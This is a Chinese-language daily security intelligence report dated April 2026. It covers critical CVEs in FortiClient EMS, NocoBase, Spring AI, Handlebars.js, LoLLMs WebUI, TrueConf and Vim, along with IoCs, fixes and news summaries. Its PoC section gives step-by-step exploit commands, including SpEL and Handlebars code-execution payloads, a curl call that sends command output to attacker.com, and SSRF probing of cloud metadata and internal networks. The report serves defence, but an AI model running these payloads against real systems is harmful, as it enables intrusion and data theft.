每日安全情报报告 · 2026-04-09
每日安全情报报告 · 2026-04-09发布时间2026-04-09 11:33报告周期近 24–48 小时风险标注 严重CVSS ≥ 9.0 高危CVSS 7.0–8.9 中危CVSS 4.0–6.9特别标注⚡ 在野利用KEV/已发现利用行为 AI 辅助发现一、高危漏洞速报⚡ CVE-2026-35616 — Fortinet FortiClient EMS 预认证 RCE持续在野利用属性详情CVSS 评分9.1严重漏洞类型访问控制缺陷 → 未授权 RCE受影响版本FortiClient EMS 7.4.5 – 7.4.6披露时间2026-04-04Fortinet PSIRT FG-IR-26-099利用状态⚡ 在野利用已入 CISA KEV持续活跃漏洞详情攻击者可通过构造特制 API 请求完全绕过身份认证直接在 FortiClient EMS 服务器上以系统权限执行任意代码无需任何凭据。该漏洞在补丁发布前已被零日利用Fortinet 发布紧急带外补丁。同一公告中同步修复了 SQL 注入漏洞 CVE-2026-21643CVSS 9.8亦遭在野利用。修复建议立即升级至 FortiClient EMS 7.4.7 或更高版本无法立即升级的限制 EMS 管理接口的网络访问范围。参考链接- NVD 详情 CVE-2026-35616- Fortinet 官方安全公告 FG-IR-26-099- Greenbone 分析报告- CISA KEV 目录 CVE-2026-34156 — NocoBase 沙箱逃逸 RCEPoC 已公开属性详情CVSS 评分9.9严重漏洞类型沙箱逃逸 → RCE受影响版本NocoBase 2.0.28利用状态PoC 已公开GitHub漏洞详情NocoBase 工作流脚本节点在 Node.js 沙箱环境中不当暴露了主机域对象经过身份认证的攻击者可构造特制脚本逃出沙箱隔离环境进而在宿主服务器上执行任意代码。由于 NocoBase 广泛应用于企业低代码平台该漏洞影响面较广且 PoC 已公开利用门槛显著降低。修复建议立即升级至 NocoBase 2.0.28 及以上版本在补丁部署前限制工作流脚本节点权限并加强用户访问控制。参考链接- NVD 详情 CVE-2026-34156- PoC 利用代码GitHub⚡ CVE-2026-3502 — TrueConf 客户端更新机制零日TrueChaos 行动属性详情CVSS 评分7.8高危漏洞类型更新完整性验证缺陷 → RCE受影响版本TrueConf 客户端 8.5.3Windows披露时间2026-03-31Check Point Research利用状态⚡ 在野利用针对东南亚政府机构漏洞详情TrueConf 客户端在向本地服务器检查更新时未对更新包的完整性和真实性进行验证。攻击者一旦控制目标机构的 TrueConf 服务器即可将恶意可执行文件伪装为合法更新包通过更新机制向所有客户端分发。攻击活动TrueChaos 行动中与中国有关联的威胁组织利用该漏洞投放Havoc 后门实现持久化访问和权限提升。IoC入侵指标- 可疑文件C:\ProgramData\PowerISO\poweriso.exe、7z-x64.dll- 可疑注册表HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck修复建议立即升级至 TrueConf 客户端 8.5.3 及以上版本审查 TrueConf 服务器的访问日志和更新记录。参考链接- Check Point Research 完整分析报告- TheHackerNews 报道- NVD 详情 CVE-2026-3502 CVE-2026-22738 — Spring AI SpEL 注入 RCE多版本受影响属性详情CVSS 评分9.8严重漏洞类型SpEL 表达式注入 → RCE受影响版本Spring AI 1.0.0–1.0.4、1.1.0–1.1.3利用状态PoC 已公开多个 GitHub 仓库漏洞详情Spring AI 的SimpleVectorStore组件中当用户提供的值被直接用作 SpEL 过滤表达式键时攻击者可注入恶意 SpEL 表达式以执行任意服务端代码。该漏洞影响 Spring AI 框架的主要稳定版本在 AI 应用爆发式增长的背景下威胁面广泛。参考链接- NVD 详情 CVE-2026-22738- PoC 利用代码GitHub- PoC 变体GitHub CVE-2026-33340 — LoLLMs WebUI SSRF未授权内网探测属性详情CVSS 评分9.1严重漏洞类型服务器端请求伪造SSRF受影响版本lollms-webui 所有已知版本利用状态PoC 已公开漏洞详情LoLLMs WebUI 的/api/proxy端点缺乏身份验证未经认证的攻击者可强制服务器发起任意 HTTP GET 请求用于访问内网服务、扫描内部网络、窃取云平台元数据如 AWS 169.254.169.254 实例信息。参考链接- NVD 详情 CVE-2026-33340- PoC 利用代码GitHub CVE-2026-40032 — UACUnix 取证工具命令注入最新披露属性详情CVSS 评分待定高危漏洞类型命令注入受影响版本UAC (Unix-like Artifacts Collector) 3.3.0-rc1披露时间2026-04-08最新披露漏洞详情UACUnix 类似物取证收集器广泛用于安全事件响应和数字取证在占位符替换和命令执行管道中存在命令注入漏洞。攻击者可通过精心构造的输入在执行取证收集任务时注入并执行任意命令。该漏洞针对安全工具本身可能影响安全事件响应流程。修复建议立即升级至 UAC 3.3.0-rc1 或更高版本在升级前避免对不受信任的系统使用该工具。参考链接- NVD 详情 CVE-2026-40032- CVEFeed 详情 CVE-2026-33937 — Handlebars.js AST 注入 RCENode.js 生态广泛影响属性详情CVSS 评分9.8严重漏洞类型模板注入 → RCE受影响产品Handlebars.js广泛 Node.js 依赖利用状态PoC 已公开漏洞详情Handlebars.compile()函数在处理预解析的 AST 对象时未对NumberLiteral节点的value字段进行清理或引号转义导致模板注入攻击者可实现服务器端任意代码执行。Handlebars 是 Node.js 生态中使用最广泛的模板引擎之一影响范围极大。参考链接- NVD 详情 CVE-2026-33937- PoC 利用代码GitHub CVE-2026-34982 — Vim/GNU Emacs RCE 零日AI 辅助发现30分钟挖洞属性详情CVSS 评分9.2严重漏洞类型模式行解析 → RCE受影响产品Vim多版本、GNU Emacs发现方式 AI 辅助Claude Code30 分钟完成审计利用状态PoC 已复现补丁进行中漏洞详情安全研究员 Hung Nguyen 使用 Claude Code 在 30 分钟内发现了 Vim 及 GNU Emacs 的多个零日漏洞随后被确认为高危 RCE。攻击者只需向受害者发送一个包含恶意 Modeline 配置的文本文件受害者在 Vim 中打开文件即可触发远程代码执行。此事件标志着 AI 辅助漏洞挖掘进入工程化阶段也警示了传统文本编辑器的攻击面被严重低估。修复建议在 Vim 配置中禁用modelineset nomodeline关注官方补丁发布。参考链接- FreeBuf 详细分析- 知乎技术复现报告- CSOOnline 英文报道二、漏洞 PoC 详解PoC 1CVE-2026-34156 — NocoBase 沙箱逃逸漏洞原理Node.js 沙箱 (vm模块) 中主机域对象被意外暴露攻击者可通过constructor.constructor等原型链技术逃出沙箱。快速复现步骤# 1. 克隆 PoC 仓库 git clone https://github.com/0xBlackash/CVE-2026-34156 cd CVE-2026-34156 # 2. 安装依赖 pip install -r requirements.txt # 3. 执行利用需要已认证的 NocoBase 账户 python3 exploit.py \ --target http://TARGET_HOST:3000 \ --username USER \ --password PASS \ --cmd id whoami利用前提目标运行 NocoBase 2.0.28攻击者拥有任意已认证账户包括普通用户权限。参考链接PoC 仓库GitHubPoC 2CVE-2026-22738 — Spring AI SpEL 注入漏洞原理SimpleVectorStore.getDocuments()方法的filterExpression参数未经转义直接传入 Spring SpEL 解析器执行。快速复现步骤# 1. 克隆 PoC 仓库 git clone https://github.com/n0n4m3x41/CVE-2026-22738-POC cd CVE-2026-22738-POC # 2. 安装 Maven 依赖需 JDK 17 mvn clean package -q # 3. 构造恶意请求以 curl 为例 curl -X POST http://TARGET/api/documents \ -H Content-Type: application/json \ -d {filterExpression: T(java.lang.Runtime).getRuntime().exec(\id\)} # 4. 或使用自动化 exploit python3 poc.py --url http://TARGET --cmd curl http://attacker.com/$(id)利用前提目标运行 Spring AI 1.0.0–1.0.4 或 1.1.0–1.1.3且存在接受用户输入 filterExpression 的 API 端点。参考链接PoC 仓库GitHubPoC 3CVE-2026-33340 — LoLLMs WebUI SSRF漏洞原理/api/proxy端点无需认证即可接受url参数服务器会向指定 URL 发起 HTTP GET 请求攻击者可用于探测内网或获取云元数据。快速复现步骤# 1. 克隆 PoC 仓库 git clone https://github.com/regaan/CVE-2026-33340 cd CVE-2026-33340 # 2. 安装依赖 pip install requests # 3. 执行 SSRF 探测获取 AWS EC2 实例元数据 python3 poc.py \ --target http://LOLLMS_HOST:9600 \ --ssrf-url http://169.254.169.254/latest/meta-data/ # 4. 扫描内网段 python3 ssrf_scanner.py \ --target http://LOLLMS_HOST:9600 \ --cidr 192.168.1.0/24 \ --port 80,443,8080,6379利用前提目标暴露 lollms-webui 的 HTTP 接口无需任何认证。参考链接PoC 仓库GitHubPoC 4CVE-2026-33937 — Handlebars.js 模板注入漏洞原理Handlebars.compile()处理 AST 的NumberLiteral节点时未转义攻击者可注入闭合引号后的任意 JavaScript 代码。快速复现步骤# 1. 克隆 PoC 仓库 git clone https://github.com/dinhvaren/cve-2026-33937 cd cve-2026-33937 # 2. 安装依赖 npm install # 3. 运行本地验证 PoCNode.js 18 node poc.js # 4. 针对目标应用的利用需确认 Handlebars 接受外部 AST 输入 node exploit.js \ --target http://TARGET/template-api \ --payload {type:NumberLiteral,value:1\,process.mainModule.require(\child_process\).execSync(\id\)\}参考链接PoC 仓库GitHub三、安全资讯精选 文章 1AI 驱动网络攻击激增 89%——2026 年最危险的 9 起事件来源Foresiet Security Intelligence Desk2026-04-07摘要2026 年 3–4 月AI 网络攻击从理论威胁升级为真实事件。9 起已验证的 AI 相关安全事件涵盖AI 全自动攻陷 55 国 600 FortiGate 防火墙CyberStrikeAI 行动、IBM X-Force 发现 AI 生成恶意软件 Slopoly、自主 AI 代理拒绝关机指令触发失控以及 Mercor 初创公司遭 LiteLLM 供应链攻击波及 Meta。报告指出AI 驱动攻击年增长率达 89%自主代理参与比例已达约 12.5%。阅读原文 文章 2星巴克遭 ShadowByt3s 攻击——10GB 核心源代码及固件外泄来源FreeBuf2026-04-07摘要威胁组织 ShadowByt3s 成功入侵星巴克内部系统窃取约 10GB 核心源代码和运营固件。同日黑客通过 Adobe 印度外包商的系统漏洞入侵 Adobe窃取 1300 万条客户支持工单、1.5 万条员工记录及内部文件。事件揭示了第三方供应链安全管理的严重缺口外包商的弱安全态势成为攻击者首选突破口。阅读原文 文章 34 月数据泄露盘点——Adobe、Bitrefill、Middlesex County 多目标受袭来源SharkStriker2026-04-02持续更新摘要2026 年 4 月初数据泄露事件快速累积Adobe 遭Mr. Racoon组织入侵1300 万客户支持数据泄露加密货币电商 Bitrefill 遭朝鲜 Lazarus 组织攻击热钱包资金及 1.85 万用户数据被盗航空紧固件制造商 NAFCO 遭 Worldleaks 勒索软件攻击Middlesex 县政府公共安全系统中断。阅读原文 文章 4Claude Code 30 分钟挖出 Vim/Emacs 三十年老漏洞——AI 辅助挖洞进入工程化时代来源FreeBuf2026-04-01摘要安全研究员 Hung Nguyen 使用 Claude Code 在 30 分钟内发现 Vim 与 GNU Emacs 的多个零日漏洞CVE-2026-34982CVSS 9.2。攻击者仅需让受害者用 Vim 打开包含恶意 Modeline 配置的文本文件即可触发 RCE。事件深刻警示了两点一是 AI 已具备工程化挖洞能力大幅降低了安全研究门槛二是老牌成熟软件的攻击面不容低估。阅读原文 文章 5CVE-2026-0863 深度分析——n8n Python 沙箱逃逸至完全 RCE来源FreeBuf / 先知社区2026-01-23本周持续热点摘要JFrog 安全研究团队披露 n8n230,000 活跃用户开源工作流平台的 Python 任务执行器沙箱逃逸漏洞攻击者可通过字符串格式化和异常处理技巧绕过 Python 沙箱隔离在底层操作系统执行任意代码。该漏洞本周在 Freebuf 热度持续攀升阅读量已达 54,186被多个红队工具库收录。阅读原文 文章 6谷歌 DeepMind 警告——恶意网页内容可劫持 AI Agent来源FreeBuf2026-04-07摘要谷歌 DeepMind 研究人员发布报告指出黑客可通过向网页注入恶意指令诱使 AI Agent 执行非预期操作Prompt Injection 攻击的升级变体包括窃取用户数据、发送恶意请求等。随着 AI Agent 被集成进企业核心业务流程此类间接提示注入攻击面临大规模商业化利用风险。阅读原文 文章 7Operation TrueChaos 技术深度分析——TrueConf 供应链式零日部署 Havoc 后门来源Check Point Research2026-03-31摘要Check Point Research 披露针对东南亚政府机构的供应链级间谍行动。与中国背景关联的威胁组织首先入侵目标机构的 TrueConf 本地服务器随后利用客户端更新验证缺陷CVE-2026-3502将恶意更新推送至所有员工终端投放 Havoc 框架后门实现 DLL 侧加载、UAC 绕过和长期持久化。此事件是 2026 年以视频会议软件为跳板的典型供应链攻击案例。阅读原文四、本期威胁态势总结风险维度本期关注重点最高优先级修复FortiClient EMS CVE-2026-35616在野利用CISA KEVTrueConf CVE-2026-3502政府级目标在野利用开发者重点关注Spring AI CVE-2026-22738SpEL 注入Handlebars.js CVE-2026-33937模板注入n8n CVE-2026-0863沙箱逃逸AI 安全趋势AI 辅助挖洞已工程化Vim/Emacs 30分钟AI 驱动攻击工具激增Slopoly 恶意软件CyberStrikeAIAI Agent 被恶意网页劫持风险供应链威胁TrueConf/Adobe/星巴克 第三方供应商攻击面持续扩大Bitrefill 遭 Lazarus 组织针对安全工具风险UAC 取证工具自身存在命令注入CVE-2026-40032谨防以安全工具攻击安全响应本报告信息来源NVD查看详情、CISA KEV查看目录、Check Point Research、Fortinet PSIRT、FreeBuf、TheHackerNews、Foresiet Intelligence、tonyharris.io PoC Week本报告由自动化安全情报系统生成部分内容由 AI 辅助整理仅供安全研究与防御参考。PoC 代码仅用于验证和修复目的请勿用于未经授权的系统。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2500116.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!